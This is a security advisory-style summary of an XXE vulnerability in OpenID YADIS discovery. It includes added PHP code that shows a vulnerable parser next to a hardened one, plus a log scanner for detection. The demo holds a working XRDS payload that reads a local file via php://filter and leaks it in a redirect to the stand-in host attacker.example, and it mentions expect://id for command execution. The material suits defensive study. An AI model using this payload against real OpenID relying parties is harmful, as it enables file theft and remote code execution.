Full Report
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
Analysis Summary
# Vulnerability: XXE Injection via OpenID YADIS Discovery Leading to File Read and Potential RCE
## CVE Details
- CVE ID: N/A (the article reports independent research on an unnamed open-source platform, prompted by the Facebook disclosure, and assigns no CVE).
- CVSS Score: N/A
- CWE: CWE-611 (Improper Restriction of XML External Entity Reference ('XXE'))
## Affected Systems
- Products: Open Source Social Platform utilizing OpenID authentication with vulnerable XML parsing during YADIS discovery (Specific platform instance mentioned was a "popular, OpenSource, Social platform").
- Versions: Not specified (any version that parses the XRDS document fetched during OpenID discovery with external entity loading enabled is affected).
- Configurations: Systems that accept OpenID logins, perform YADIS discovery on the user-supplied identifier, and parse the resulting XRDS with an XML parser that resolves external entities.
## Vulnerability Description
The vulnerability arises during OpenID discovery when the relying party uses the YADIS method. YADIS works by fetching an XRDS document, which is XML, from the URL the user submitted as their OpenID identifier. Because the attacker chooses that URL, the attacker also chooses the XRDS content. If the relying party's XML parser substitutes entities and loads external ones (in PHP, parsing with `LIBXML_NOENT` while the libxml entity loader is enabled), the XRDS document can declare an external entity whose SYSTEM identifier points at a local file, an internal URL, or a PHP stream wrapper, and reference that entity inside the `<URI>` element that names the OpenID provider endpoint. The parser resolves the entity while the server reads the document, so the resource is read server-side and its content becomes part of the "discovered" endpoint URL. The result is file disclosure, or, with the `expect://` wrapper, command execution.
In the exploitation described, the entity's SYSTEM identifier used `php://filter/convert.base64-encode/resource=...` to read local files such as `/etc/passwd` or `config.php`; the base64-encoded content then appeared in the URL the platform redirected the user to once discovery completed. Base64 matters here because raw file contents containing `<`, `&` or non-printable bytes would make the expanded entity ill-formed XML and abort the parse. The `expect://` wrapper was used to execute `id`; note that `expect://` is provided by the PECL expect extension and is not present in a default PHP build, so this escalation depends on the target's configuration.
## Exploitation
- Status: PoC available (the author built a working XRDS payload and demonstrated file read, and an emulated RCE, against a test installation of the platform).
- Complexity: Medium (requires understanding of OpenID discovery, XXE, and the PHP stream wrappers used for escalation).
- Attack Vector: Network (the attacker only submits an OpenID identifier URL pointing at a server they control; the relying party fetches the malicious XRDS document itself, and discovery runs before the user is authenticated).
## Impact
- Confidentiality: High (Allows reading arbitrary local files, including configuration files containing credentials).
- Integrity: High (Potential to execute arbitrary code on the server).
- Availability: Low (Impact is primarily focused on data compromise, although RCE could lead to service disruption).
## Remediation
### Patches
- Specific patch versions for the mentioned "OpenSource Social Platform" are not provided in the text.
### Workarounds
- **PHP specific mitigation:** On PHP versions before 8.0, disable the libxml external entity loader before parsing the XRDS document:
```php
libxml_disable_entity_loader(true);
```
  `libxml_disable_entity_loader()` is deprecated as of PHP 8.0, where external entity loading is off by default; on any version, never pass `LIBXML_NOENT` (or `LIBXML_DTDLOAD`) when parsing discovery responses, because `LIBXML_NOENT` re-enables entity substitution and with it this attack.
- Reject any XRDS document that contains a DOCTYPE (a well-formed XRDS never needs one), and validate that the discovered OP endpoint is an `http` or `https` URL with no embedded whitespace or wrapper scheme before redirecting the user to it; in this attack the leaked data travels in that redirect URL.
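The discovery step described under Vulnerability Description, and the hardening described under Workarounds, as an added example in PHP. This is not code from the SensePost article or from any OpenID library; the attacker host `attacker.example`, the secret file and its contents are made up, and the XRDS document is constructed inline so the script runs offline.

```php
<?php
// Added example, not code from the SensePost article or from any OpenID
// library: a minimal YADIS discovery step that parses an attacker-served XRDS
// document, shown once with the parser flag that makes it vulnerable and once
// hardened. The attacker host, file name and file contents are made up.
declare(strict_types=1);

const XRD_NS = 'xri://$xrd*($v*2.0)';

// Stand-in for /etc/passwd or config.php so the script runs anywhere.
$secretFile = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretFile, "db_password=hunter2\n");

// What the attacker's "identity provider" returns to YADIS discovery. The
// entity is referenced inside <URI>, so its expansion becomes part of the OP
// endpoint the relying party will redirect the user to. base64 keeps the
// expansion well-formed even if the file contains '<' or '&'. Pointing the
// entity at expect://id instead would run a command, if the PECL expect
// extension is loaded on the target.
$template = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds:XRDS [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=__SECRET__">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>http://attacker.example/openid?leak=&xxe;</URI>
    </Service>
  </XRD>
</xrds:XRDS>
XML;
$maliciousXrds = str_replace('__SECRET__', $secretFile, $template);

/**
 * Vulnerable discovery: LIBXML_NOENT tells libxml to substitute entities, and
 * PHP's entity loader resolves SYSTEM identifiers through its stream wrappers,
 * so php://filter reads the file while the document is being parsed.
 */
function discoverOpEndpointVulnerable(string $xrds): ?string
{
    $dom = new DOMDocument();
    $dom->loadXML($xrds, LIBXML_NOENT);
    $uri = $dom->getElementsByTagNameNS(XRD_NS, 'URI')->item(0);
    return $uri === null ? null : $uri->textContent;
}

/**
 * Hardened discovery: refuse any DTD, never ask for entity substitution, block
 * parser network access, and only accept an http(s) endpoint. On PHP < 8.0
 * the entity loader is also switched off explicitly; PHP 8 leaves it off
 * unless LIBXML_NOENT is passed.
 */
function discoverOpEndpointHardened(string $xrds): string
{
    if (preg_match('/<!DOCTYPE/i', $xrds)) {
        throw new RuntimeException('XRDS contains a DTD; refusing to parse');
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    if (!$dom->loadXML($xrds, LIBXML_NONET)) {
        throw new RuntimeException('XRDS is not well-formed XML');
    }
    if ($dom->doctype !== null) { // second check, in case the regex was evaded
        throw new RuntimeException('XRDS contains a DTD; refusing to parse');
    }
    $uri = $dom->getElementsByTagNameNS(XRD_NS, 'URI')->item(0);
    $endpoint = $uri === null ? '' : trim($uri->textContent);
    $scheme = strtolower((string) parse_url($endpoint, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true) || preg_match('/\s/', $endpoint)) {
        throw new RuntimeException("Discovered OP endpoint is not a usable URL: $endpoint");
    }
    return $endpoint;
}

// Vulnerable parse first: on PHP < 8 the hardened function disables the
// entity loader process-wide, which would mask the vulnerable behaviour.
$leaked = discoverOpEndpointVulnerable($maliciousXrds);
echo "vulnerable parse would redirect the user to:\n  $leaked\n";
$blob = substr((string) $leaked, strlen('http://attacker.example/openid?leak='));
echo "which the attacker decodes to:\n  " . base64_decode($blob);

try {
    discoverOpEndpointHardened($maliciousXrds);
} catch (RuntimeException $e) {
    echo 'hardened parse: ' . $e->getMessage() . "\n";
}
unlink($secretFile);
```

Run it with `php xrds_xxe.php`. The vulnerable function prints the redirect target with the base64 of the stand-in file in its query string, which is exactly what the victim's browser would carry to the attacker's server; the hardened function refuses the document before the parser ever sees the entity declaration, and would still reject the result on the endpoint check if the DOCTYPE filter were bypassed.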
## Detection
- **Indicators of compromise:** The malicious XML never appears in the inbound login request; the user only submits an identifier URL, and the relying party fetches the XRDS itself. Look for outbound requests from the web server process, made during OpenID discovery, to unfamiliar hosts or to internal addresses, and for discovery results (the OP endpoint the application redirects the user to) that contain a stream wrapper scheme such as `php://` or `expect://`, a file path, unencoded whitespace, or a long base64 blob. The leaked data also lands in the attacker's web server logs when the victim's browser follows the redirect, so the relying party's own access log may show nothing more than a login POST answered with a 302.
- **Detection methods and tools:** Inspect the fetched XRDS body (at an egress proxy, or in the application before parsing) for `<!DOCTYPE` and `<!ENTITY` declarations rather than inspecting inbound request parameters, which will not contain them. Alert on server-side HTTP fetches triggered by OpenID logins that target RFC 1918 or link-local addresses or non-HTTP schemes, and on OpenID redirects whose target URL is unusually long, contains a wrapper scheme, or fails URL validation.
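The redirect-target heuristics above, run over a few log lines, as an added example that is not part of the original article. The `openid.discover` log format is invented for this example (a relying party that records the submitted identifier and the endpoint discovery returned); the sample lines are constructed, and the `attacker.example` and `provider.example` hosts are made up. Adapt `LOG_LINE` to whatever your OpenID library actually logs.

```php
<?php
// Added example, not from the article: scan a relying party's discovery log
// for OP endpoints that look like XXE output. The log format is made up for
// this example; adapt LOG_LINE to what your OpenID library records.
declare(strict_types=1);

const LOG_LINE = '/^(?<ts>\S+) openid\.discover identifier="(?<id>[^"]*)" op_endpoint="(?<op>[^"]*)"/';

/**
 * Returns one finding per suspicious line: timestamp, submitted identifier,
 * and the reasons the discovered endpoint is not a plausible OpenID provider.
 */
function scanDiscoveryLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_LINE, $line, $m)) {
            continue;
        }
        $op = $m['op'];
        $reasons = [];

        // A real OP endpoint is an http(s) URL with no unencoded whitespace.
        $scheme = strtolower((string) parse_url($op, PHP_URL_SCHEME));
        if (!in_array($scheme, ['http', 'https'], true)) {
            $reasons[] = "scheme '$scheme' is not http(s)";
        }
        if (preg_match('/\s/', $op)) {
            $reasons[] = 'unencoded whitespace (typical of command output reflected into the URL)';
        }
        // Stream wrappers anywhere in the URL, query string included, point at
        // entity expansion rather than at a genuine provider.
        if (preg_match('#\b(php|expect|file|data|glob|phar)://#i', $op, $w)) {
            $reasons[] = "stream wrapper {$w[1]}:// embedded in endpoint";
        }
        // A long base64 run that decodes to text is the php://filter
        // signature: endpoints are short, leaked files are not.
        if (preg_match('#([A-Za-z0-9+/]{40,}={0,2})#', $op, $b)) {
            $decoded = base64_decode($b[1], true);
            if ($decoded !== false && preg_match('/^[\x20-\x7e\s]+$/', $decoded)) {
                $reasons[] = 'base64 blob decodes to text: ' . json_encode(substr($decoded, 0, 40));
            }
        }
        if ($reasons !== []) {
            $findings[] = ['ts' => $m['ts'], 'identifier' => $m['id'], 'reasons' => $reasons];
        }
    }
    return $findings;
}

// Constructed sample log: one legitimate discovery, one php://filter leak of a
// passwd-style line, one expect://id result reflected into the URL, one
// unrelated line.
$leakedPasswd = base64_encode("root:x:0:0:root:/root:/bin/bash\n");
$sample = [
    '2015-04-21T10:03:11Z openid.discover identifier="https://alice.provider.example/" op_endpoint="https://provider.example/openid/server"',
    '2015-04-21T10:05:42Z openid.discover identifier="http://attacker.example/id" op_endpoint="http://attacker.example/openid?leak=' . $leakedPasswd . '"',
    '2015-04-21T10:06:09Z openid.discover identifier="http://attacker.example/id2" op_endpoint="http://attacker.example/openid?out=uid=33(www-data) gid=33(www-data)"',
    'unrelated line that does not match',
];

foreach (scanDiscoveryLog($sample) as $f) {
    echo "{$f['ts']} identifier={$f['identifier']}\n  - " . implode("\n  - ", $f['reasons']) . "\n";
}
```

The first sample line produces no finding; the second is flagged on the base64 check, the third on the whitespace check. The decode-to-printable test on the base64 run is what keeps long but legitimate tokens (session identifiers, signed parameters) from being reported.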
## References
- Vendor advisories: N/A (the article reports independent research following the public Facebook disclosure; no vendor advisory is cited).
- Relevant links - defanged:
- SensePost Article Link: sensepost com/revisiting-xxe-and-abusing-protocols/
- OWASP XXE Reference: owasp org/index php/XML_External_Entity_(XXE)_Processing
- PHP Security Tips: phpsecurity readthedocs org/en/latest/Injection-Attacks html